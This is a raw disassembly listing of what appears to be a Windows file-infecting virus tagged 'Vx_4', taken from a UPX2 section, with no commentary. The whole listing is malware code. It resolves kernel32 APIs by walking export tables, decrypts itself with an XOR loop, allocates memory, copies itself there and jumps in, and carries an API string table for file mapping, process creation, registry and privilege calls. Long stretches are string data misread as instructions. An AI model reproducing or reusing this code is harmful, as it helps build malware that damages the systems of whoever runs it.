sldt cx
test ecx, ecx
jnz short loc_3144207B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3144207B: ; CODE XREF: UPX2:31442074�j
and ebx, 0FFFFF000h
loc_31442081: ; CODE XREF: UPX2:31442090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_31442092
loc_3144208A: ; CODE XREF: UPX2:3144209F�j
sub ebx, 100h
jnz short loc_31442081
loc_31442092: ; CODE XREF: UPX2:31442088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3144208A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_314420AC: ; CODE XREF: UPX2:loc_314420C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_314420C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_314420C5
loc_314420C0: ; CODE XREF: UPX2:314420B5�j
loop loc_314420AC
pop ecx
jmp short loc_314420F0
; ---------------------------------------------------------------------------
loc_314420C5: ; CODE XREF: UPX2:314420BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_31442137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144217E
loc_314420F0: ; CODE XREF: UPX2:314420C3�j
; sub_3144217E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_3144211C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_3144211C: ; CODE XREF: sub_3144217E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3144217E
; ---------------------------------------------------------------------------
dw 6FCEh
; =============== S U B R O U T I N E =======================================
sub_31442120 proc near ; CODE XREF: sub_3144445B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_31442128: ; CODE XREF: sub_31442120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_31442128
pop ebx
retn
sub_31442120 endp
; ---------------------------------------------------------------------------
loc_31442137: ; CODE XREF: UPX2:314420EE�j
call near ptr loc_31442146+2
inc ebx
insb
outsd
jnb short near ptr loc_314421A3+3
dec eax
popa
outsb
db 64h
insb
loc_31442146: ; CODE XREF: UPX2:loc_31442137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_31442162+1
inc ebx
jb short loc_314421BE
popa
jz short near ptr loc_314421C0+1
inc ebp
jbe short near ptr loc_314421C0+4
outsb
jz short loc_314421A3
loc_31442162: ; CODE XREF: UPX2:31442151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_3144217E
inc edi
db 65h
jz short near ptr loc_314421C0+1
popa
jnb short near ptr loc_314421EA+2
inc ebp
jb short near ptr loc_314421EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3144217E proc near ; CODE XREF: UPX2:3144216C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 314420F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31442534 SIZE 0000000B BYTES
push ebx
call esi ; lstrcatA
mov [ebp+103E6Ah], eax
call sub_3144255F
test eax, eax
jz loc_314420F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_31442534
loc_314421A3: ; CODE XREF: UPX2:31442160�j
; UPX2:3144213F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_314421C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_314421BE: ; CODE XREF: UPX2:31442157�j
jmp short loc_314421C7
; ---------------------------------------------------------------------------
loc_314421C0: ; CODE XREF: sub_3144217E+2C�j
; UPX2:3144215A�j ...
and dword ptr [ebp+101598h], 0
loc_314421C7: ; CODE XREF: sub_3144217E:loc_314421BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_314421EA: ; CODE XREF: UPX2:31442176�j
; UPX2:31442179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_3144259C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_314422E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_31442534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_31442534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_31442534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_314422D3
jmp loc_31442534
; ---------------------------------------------------------------------------
loc_314422D3: ; CODE XREF: sub_3144217E+14B�p
; sub_3144217E+162�j
push 1
pop ecx
jecxz short locret_314422E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_314422D3
; ---------------------------------------------------------------------------
locret_314422E2: ; CODE XREF: sub_3144217E+158�j
retn
; ---------------------------------------------------------------------------
loc_314422E3: ; CODE XREF: sub_3144217E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_31442534
call near ptr loc_314422FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_314422FA: ; CODE XREF: sub_3144217E+172�p
add bh, bh
sub_3144217E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3144259C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_31442534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_31442534
mov ecx, [ebp+103F06h]
jecxz short loc_31442383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_31442383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_31442383: ; CODE XREF: UPX2:31442367�j
; UPX2:31442378�j
call sub_31442540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_314423CC: ; CODE XREF: UPX2:314423D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_314423CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_31442534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144217E
loc_31442534: ; CODE XREF: sub_3144217E+1F�j
; sub_3144217E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_314420F0
; END OF FUNCTION CHUNK FOR sub_3144217E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31442540 proc near ; CODE XREF: UPX2:loc_31442383�p
; sub_3144255F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_31442540 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3144255F proc near ; CODE XREF: sub_3144217E+9�p
xor ecx, ecx
call sub_31442540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_3144255F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_3144259C proc near ; CODE XREF: sub_3144217E+7C�p
; UPX2:31442312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_314425A7: ; CODE XREF: sub_3144259C+E�j
lodsb
test al, al
jnz short loc_314425A7
loop sub_3144259C
retn
sub_3144259C endp
; =============== S U B R O U T I N E =======================================
sub_314425AF proc near ; CODE XREF: sub_3144412D+25�p
; FUNCTION CHUNK AT 31442639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 31442A09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_314425DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_31442639
jbe short near ptr loc_31442639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_31442640
inc ecx
loc_314425DC: ; CODE XREF: sub_314425AF+13�p
add [eax-1], dl
sub_314425AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_314425AF
loc_31442639: ; CODE XREF: sub_314425AF+1F�j
; sub_314425AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_314426A3+2
loc_31442640: ; CODE XREF: sub_314425AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_314426AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_314426B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_314426C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_314426E1+1
push 4500746Fh
js short loc_314426DF
jz short near ptr loc_314426CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_31442700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_314426E3+6
loc_314426A3: ; CODE XREF: sub_314425AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_314426AB: ; CODE XREF: sub_314425AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_314426F2
add [edi+65h], al
jz short near ptr loc_314426FB+1
loc_314426B6: ; CODE XREF: sub_314425AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_31442708
loc_314426C2: ; CODE XREF: sub_314425AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_314426CB: ; CODE XREF: sub_314425AF+C7�j
db 65h
jz short near ptr loc_3144271A+1
outsd
db 64h
jnz short near ptr loc_31442739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_3144272D+6
loc_314426DF: ; CODE XREF: sub_314425AF+C5�j
db 65h
insd
loc_314426E1: ; CODE XREF: sub_314425AF+BE�j
jo short near ptr loc_31442727+2
loc_314426E3: ; CODE XREF: sub_314425AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_31442741+3
db 65h
insd
loc_314426F2: ; CODE XREF: sub_314425AF+FF�j
jo short near ptr loc_31442741+3
popa
jz short near ptr loc_3144275E+1
inc ecx
add [edi+65h], al
loc_314426FB: ; CODE XREF: sub_314425AF+105�j
jz short loc_31442753
db 65h
jb short near ptr loc_31442772+1
loc_31442700: ; CODE XREF: sub_314425AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_31442708: ; CODE XREF: sub_314425AF+110�j
db 65h
jb short near ptr loc_3144277C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_3144276B+1
outsd
insb
jnz short near ptr loc_31442781+6
loc_3144271A: ; CODE XREF: sub_314425AF:loc_314426CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3144278C+2
popa
jz short near ptr loc_3144278C+1
outsd
outsb
inc ecx
loc_31442727: ; CODE XREF: sub_314425AF:loc_314426E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_3144272D: ; CODE XREF: sub_314425AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3144278F
loc_31442739: ; CODE XREF: sub_314425AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_31442741: ; CODE XREF: sub_314425AF+13F�j
; sub_314425AF:loc_314426F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_31442753: ; CODE XREF: sub_314425AF:loc_314426FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_314427C9+1
arpl [ebp+73h], sp
loc_3144275E: ; CODE XREF: sub_314425AF+146�j
jnb short $+2
push eax
jb short loc_314427D2
arpl [ebp+73h], sp
jnb short near ptr loc_31442794+7
xor al, [esi+69h]
loc_3144276B: ; CODE XREF: sub_314425AF+164�j
jb short near ptr loc_314427DA+6
jz short $+2
push eax
jb short near ptr loc_314427DA+7
loc_31442772: ; CODE XREF: sub_314425AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_314427A9+1
xor cl, [esi+65h]
js short near ptr loc_314427EC+4
loc_3144277C: ; CODE XREF: sub_314425AF:loc_31442708�j
add [ebx+65h], dl
jz short near ptr loc_314427C5+2
loc_31442781: ; CODE XREF: sub_314425AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3144278C: ; CODE XREF: sub_314425AF+173�j
; sub_314425AF+170�j
db 65h
jnb short loc_314427D0
loc_3144278F: ; CODE XREF: sub_314425AF+188�j
add [ebx+65h], dl
jz short loc_314427DA
loc_31442794: ; CODE XREF: sub_314425AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_31442818
jz short loc_3144280C
insd
push esp
loc_314427A9: ; CODE XREF: sub_314425AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_31442813
imul esp, [ebp+77h], 6946664Fh
insb
loc_314427C5: ; CODE XREF: sub_314425AF+1D0�j
add gs:[esi+69h], dl
loc_314427C9: ; CODE XREF: sub_314425AF+1AA�j
jb short near ptr loc_3144283E+1
jnz short loc_3144282E
insb
inc ecx
insb
loc_314427D0: ; CODE XREF: sub_314425AF:loc_3144278C�j
insb
outsd
loc_314427D2: ; CODE XREF: sub_314425AF+1B2�j
arpl [eax], ax
push edi
jb short loc_31442840
jz short loc_3144283E
inc esi
loc_314427DA: ; CODE XREF: sub_314425AF+1E3�j
; sub_314425AF:loc_3144276B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_3144285A
push eax
jb short near ptr loc_3144284F+3
jbe short near ptr loc_3144284F+5
insb
loc_314427EC: ; CODE XREF: sub_314425AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 2845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3144283B+1
jb short near ptr loc_3144285F+1
popa
jz short loc_31442863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_31442870
push eax
loc_3144280C: ; CODE XREF: sub_314425AF+1F6�j
jb short loc_3144287D
arpl [ebp+73h], sp
jnb short $+2
loc_31442813: ; CODE XREF: sub_314425AF+20C�j
dec esi
jz short near ptr loc_31442856+3
jb short loc_3144287D
loc_31442818: ; CODE XREF: sub_314425AF+1F4�j
popa
jz short loc_31442880
push eax
jb short loc_3144288D
arpl [ebp+73h], sp
jnb short near ptr loc_31442863+5
js short $+2
dec esi
jz short loc_3144286B
jb short loc_3144288F
popa
jz short near ptr loc_3144288F+3
push ebx
loc_3144282E: ; CODE XREF: sub_314425AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3144289E+1
popa
loc_3144283B: ; CODE XREF: sub_314425AF+248�j
jz short loc_314428A2
push ebp
loc_3144283E: ; CODE XREF: sub_314425AF+228�j
; sub_314425AF:loc_314427C9�j
jnb short near ptr loc_314428A4+1
loc_31442840: ; CODE XREF: sub_314425AF+226�j
jb short near ptr loc_3144288F+3
jb short loc_314428B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_31442899
popa
jo short near ptr loc_314428A4+1
loc_3144284F: ; CODE XREF: sub_314425AF+238�j
; sub_314425AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_31442856: ; CODE XREF: sub_314425AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_3144285A: ; CODE XREF: sub_314425AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_3144285F: ; CODE XREF: sub_314425AF+24A�j
jo short loc_314428C6
outsb
inc esi
loc_31442863: ; CODE XREF: sub_314425AF+24D�j
; sub_314425AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_3144286B: ; CODE XREF: sub_314425AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_314428DF
loc_31442870: ; CODE XREF: sub_314425AF+25A�j
arpl [ebp+73h], sp
jnb short loc_314428C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_314428CB+1
loc_3144287D: ; CODE XREF: sub_314425AF:loc_3144280C�j
; sub_314425AF+267�j
jo short near ptr loc_314428E3+1
outsb
loc_31442880: ; CODE XREF: sub_314425AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_314428FB+1
loc_3144288D: ; CODE XREF: sub_314425AF+26D�j
jz short near ptr loc_314428F3+1
loc_3144288F: ; CODE XREF: sub_314425AF+279�j
; sub_314425AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_31442909
jnz short near ptr loc_314428F7+1
insb
dec ebp
loc_31442899: ; CODE XREF: sub_314425AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_31442914+3
loc_3144289E: ; CODE XREF: sub_314425AF+289�j
add [esi+74h], cl
push ecx
loc_314428A2: ; CODE XREF: sub_314425AF:loc_3144283B�j
jnz short loc_31442909
loc_314428A4: ; CODE XREF: sub_314425AF:loc_3144283E�j
; sub_314425AF+29E�j
jb short near ptr loc_3144291E+1
dec ecx
outsb
outsw
jb short near ptr loc_31442918+1
popa
jz short loc_31442918
outsd
outsb
push esp
outsd
loc_314428B3: ; CODE XREF: sub_314425AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3144290F+2
jb short loc_31442925
jz short near ptr loc_31442922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_314428C6: ; CODE XREF: sub_314425AF:loc_3144285F�j
db 65h
insd
outsd
loc_314428C9: ; CODE XREF: sub_314425AF+2C4�j
jb short loc_31442944
loc_314428CB: ; CODE XREF: sub_314425AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_31442941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_314428DF: ; CODE XREF: sub_314425AF+2BF�j
outsb
jnb short near ptr loc_3144294A+1
push ebx
loc_314428E3: ; CODE XREF: sub_314425AF:loc_3144287D�j
jz short loc_31442957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_31442950
jb short loc_31442965
jnz short near ptr loc_31442962+1
loc_314428F3: ; CODE XREF: sub_314425AF:loc_3144288D�j
add [ebx+6Ch], ah
outsd
loc_314428F7: ; CODE XREF: sub_314425AF+2E6�j
jnb short loc_3144295E
jnb short near ptr loc_31442969+1
loc_314428FB: ; CODE XREF: sub_314425AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_31442909: ; CODE XREF: sub_314425AF+2E4�j
; sub_314425AF:loc_314428A2�j
db 65h
jz short near ptr loc_31442973+1
outsd
jnb short near ptr loc_31442981+2
loc_3144290F: ; CODE XREF: sub_314425AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_31442914: ; CODE XREF: sub_314425AF+2ED�j
add gs:[edx+65h], dh
loc_31442918: ; CODE XREF: sub_314425AF+2FE�j
; sub_314425AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_31442981+1
outsb
loc_3144291E: ; CODE XREF: sub_314425AF:loc_314428A4�j
add fs:[ebx+6Fh], dh
loc_31442922: ; CODE XREF: sub_314425AF+30D�j
arpl [ebx+65h], bp
loc_31442925: ; CODE XREF: sub_314425AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_31442990
jb short loc_3144299B
db 65h
jz short loc_31442973
insb
outsd
jnb short near ptr loc_31442998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_314429A4
jb short near ptr loc_314429AE+1
loc_31442941: ; CODE XREF: sub_314425AF+329�j
db 65h
jz short loc_3144298B
loc_31442944: ; CODE XREF: sub_314425AF:loc_314428C9�j
db 65h
jz short loc_3144298A
outsd
outsb
outsb
loc_3144294A: ; CODE XREF: sub_314425AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_31442950: ; CODE XREF: sub_314425AF+33E�j
jz short near ptr loc_314429B2+1
jz short loc_314429B9
add [ecx+6Eh], cl
loc_31442957: ; CODE XREF: sub_314425AF:loc_314428E3�j
jz short near ptr loc_314429BC+2
jb short loc_314429C9
db 65h
jz short near ptr loc_314429AB+2
loc_3144295E: ; CODE XREF: sub_314425AF:loc_314428F7�j
jo short loc_314429C5
outsb
inc ecx
loc_31442962: ; CODE XREF: sub_314425AF+342�j
add [ecx+6Eh], cl
loc_31442965: ; CODE XREF: sub_314425AF+340�j
jz short near ptr loc_314429CB+1
jb short loc_314429D7
loc_31442969: ; CODE XREF: sub_314425AF+34A�j
db 65h
jz short near ptr loc_314429BA+1
jo short loc_314429D3
outsb
push ebp
jb short near ptr loc_314429DC+2
inc ecx
loc_31442973: ; CODE XREF: sub_314425AF+37E�j
; sub_314425AF:loc_31442909�j
add [ecx+6Eh], cl
jz short near ptr loc_314429DC+1
jb short loc_314429E8
db 65h
jz short near ptr loc_314429CE+1
db 65h
popa
db 64h
inc esi
loc_31442981: ; CODE XREF: sub_314425AF+36C�j
; sub_314425AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_3144298A: ; CODE XREF: sub_314425AF:loc_31442944�j
dec ecx
loc_3144298B: ; CODE XREF: sub_314425AF:loc_31442941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_31442990: ; CODE XREF: sub_314425AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_31442998: ; CODE XREF: sub_314425AF+383�j
jnb short near ptr loc_314429FD+2
dec ebx
loc_3144299B: ; CODE XREF: sub_314425AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_31442A09
loc_314429A4: ; CODE XREF: sub_314425AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_314429EC+2
js short loc_314429EC
loc_314429AB: ; CODE XREF: sub_314425AF+3AC�j
add [edx+65h], dl
loc_314429AE: ; CODE XREF: sub_314425AF+390�j
db 67h
push ecx
jnz short loc_31442A17
loc_314429B2: ; CODE XREF: sub_314425AF:loc_31442950�j
jb short near ptr loc_31442A2C+1
push esi
popa
insb
jnz short near ptr loc_31442A1D+1
loc_314429B9: ; CODE XREF: sub_314425AF+3A3�j
inc ebp
loc_314429BA: ; CODE XREF: sub_314425AF:loc_31442969�j
js short loc_314429FD
loc_314429BC: ; CODE XREF: sub_314425AF:loc_31442957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_31442A1A
popa
loc_314429C5: ; CODE XREF: sub_314425AF:loc_3144295E�j
insb
jnz short near ptr loc_31442A2C+1
inc ebp
loc_314429C9: ; CODE XREF: sub_314425AF+3AA�j
js short loc_31442A0C
loc_314429CB: ; CODE XREF: sub_314425AF:loc_31442965�j
add [esi+33h], dl
loc_314429CE: ; CODE XREF: sub_314425AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_314429D3: ; CODE XREF: sub_314425AF+3BD�j
mov edx, esp
push 1
loc_314429D7: ; CODE XREF: sub_314425AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_314429DC: ; CODE XREF: sub_314425AF+3C7�j
; sub_314425AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_314429E8: ; CODE XREF: sub_314425AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_314429EC: ; CODE XREF: sub_314425AF+3FA�j
; sub_314425AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_314425AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_314429FD: ; CODE XREF: sub_314425AF:loc_314429BA�j
; sub_314425AF:loc_31442998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_314425AF
loc_31442A09: ; CODE XREF: sub_314425AF+3F3�j
add [edx+5], ch
loc_31442A0C: ; CODE XREF: sub_314425AF:loc_314429C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_31442A17: ; CODE XREF: sub_314425AF+401�j
push esp
push 40h
loc_31442A1A: ; CODE XREF: sub_314425AF+412�j
push ecx
push edx
